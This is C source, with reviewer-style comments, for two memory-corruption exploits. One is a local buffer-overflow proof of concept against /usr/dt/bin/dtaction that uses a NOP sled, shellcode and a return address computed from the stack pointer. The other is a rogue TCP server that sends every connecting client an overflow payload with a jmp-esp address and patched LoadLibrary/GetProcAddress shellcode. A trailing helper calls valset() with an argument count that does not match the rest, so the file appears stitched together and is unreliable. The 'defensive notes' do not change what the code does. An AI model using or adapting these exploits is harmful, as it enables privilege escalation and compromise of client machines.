/*
 * Entry point of a local proof-of-concept against /usr/dt/bin/dtaction.
 * Fills buf with NOP bytes, copies shell_code so that it ends just before
 * EIP_OFFSET, patches two slots (FAKE_OFFSET, EIP_OFFSET) either with the
 * built-in constants or with values derived from the current stack
 * pointer, and finally passes buf as argv[0] to dtaction via execl().
 * Pre-C99 style: implicit int return type and no return statement.
 */
main() {
    char buf[BUF_SIZE];
    unsigned int esp=get_sp(),sw;
    memset(buf,NOP,BUF_SIZE);
    /* shell_code is placed so that its last byte sits at EIP_OFFSET-1 */
    memcpy(buf+EIP_OFFSET-strlen(shell_code),shell_code, strlen(shell_code));
    printf("esp=%x\n",esp);
    printf("0:Default value 1:Calculated value >");
    fflush(stdout);
    /* NOTE(review): sw is unsigned but is read with %d, and the scanf()
       result is not checked — on non-numeric input sw stays uninitialized
       and the if below reads an indeterminate value. */
    scanf("%d",&sw);
    if (sw==0){
        valset(buf+FAKE_OFFSET, FAKE_VALUE);
        valset(buf+EIP_OFFSET , EIP_VALUE);
        printf("Jumping address = %x\n",EIP_VALUE);
    }else{
        /* Both values are offsets from the esp sampled above, i.e. they
           depend on this process's exact stack layout; changing the locals
           or their order in this function would change the result. */
        valset(buf+FAKE_OFFSET, esp-FAKE_VALUE_DIF);
        valset(buf+EIP_OFFSET , esp+EIP_VALUE_DIF);
        printf("Jumping address = %x\n",esp+EIP_VALUE_DIF);
    }
    /* terminate so buf is a valid C string for the argv[0] slot */
    buf[BUF_SIZE-1]=0;
    /* Defensive note: the observable artifact of this program is a dtaction
       process whose argv[0] is BUF_SIZE-1 bytes, almost all NOP — an easy
       indicator in process accounting or audit records. */
    execl("/usr/dt/bin/dtaction",buf,NULL);
}
/*
 * Entry point of a rogue-server proof-of-concept. Builds one response
 * payload up front (NOP-filled buf, an address slot at RETADR, the "egg"
 * code at CODEOFS, all formatted through RESP into pkt), then listens on
 * SERVICE_PORT and answers every connection that sends at least one byte
 * with that payload before closing it. The loop never terminates on its
 * own. Pre-C99 style: implicit int return type and no return statement.
 */
main() {
    FILE *fp;                       /* declared but never used in this body */
    static char buf[MAXBUF];        /* static: keeps the large buffers off the stack */
    static char pkt[MAXBUF*2];
    char tmp[512];
    int sock,sock_accept;
    int optval;
    struct sockaddr_in addr;
    memset(buf,NOP,MAXBUF);
    valset(buf+RETADR,JMPESP_ADR);
    /* egg is patched in place before it is copied; presumably a writable
       file-scope array — if it were a string literal this write would be
       undefined behaviour. TODO confirm its definition. */
    valset(egg+OFS_LoadLibrary,ADDR_LoadLibrary);
    valset(egg+OFS_GetProcAddress,ADDR_GetProcAddress);
    /* strncpy() with strlen(egg) copies the bytes without a terminator;
       that is intended here, buf is already NOP-filled and terminated below. */
    strncpy(buf+CODEOFS,egg,strlen(egg));
    buf[MAXBUF-1]=0;
    /* NOTE(review): unbounded sprintf(); it is only safe if RESP plus the
       MAXBUF-1 bytes of buf fit in pkt (MAXBUF*2), which is not checked. */
    sprintf(pkt,RESP,buf);
    if ((sock=socket(AF_INET,SOCK_STREAM,0))==-1){
        perror("socket");
        exit(1);
    }
    /* SO_REUSEADDR so a restart does not fail on a lingering TIME_WAIT port */
    optval=1;
    setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,(void *)&optval,sizeof(optval));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(SERVICE_PORT);
    addr.sin_addr.s_addr = INADDR_ANY;      /* accepts connections on every interface */
    if ((bind(sock,(struct sockaddr *)&addr,sizeof(addr)))==-1){
        perror("bind");
        close(sock);
        exit(1);
    }
    if (listen(sock,1)==-1){
        perror("listen");
        close(sock);
        exit(1);
    }
    for (;;){
        if ((sock_accept=accept(sock,NULL,NULL))==-1){
            perror("accept");
            close(sock);
            exit(1);
        }
        /* the request content in tmp is never examined; only the fact
           that something (or nothing) arrived decides the response */
        if (recv(sock_accept,tmp,sizeof(tmp),0)<=0){
            close(sock_accept);
            continue;
        }
        /* NOTE(review): send() return value is ignored, so a short write is
           not detected. Defensive note: the response is a large, mostly-NOP
           body wrapped in RESP — a recognisable pattern for IDS signatures. */
        send(sock_accept,pkt,strlen(pkt),0);
        close(sock_accept);
    }
}
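/*
 * Fill cnt consecutive slots starting at data with the value at val,
 * issuing one valset() call per slot, and return data.
 *
 * @param data  destination buffer; returned unchanged on success
 * @param val   pointer to the value handed to valset()
 * @param vt    value type descriptor forwarded to valset()
 * @param cnt   number of valset() calls to make
 * @return data, or NULL when data or val is NULL (nothing written)
 *
 * The cursor advances one byte per call, exactly as the original did with
 * arithmetic on a void pointer (a compiler extension, not ISO C); an
 * unsigned char cursor gives the same stride portably.
 * NOTE(review): if valset() writes more than one byte for a given vt, the
 * successive writes overlap — confirm the intended stride against valset().
 */
void *val_memset(void *data, const void *val, valType_t vt, size_t cnt) {
    if (data == NULL || val == NULL)
        return NULL;
    unsigned char *cursor = data;
    while (cnt--)
        valset(cursor++, val, vt);
    return data;
}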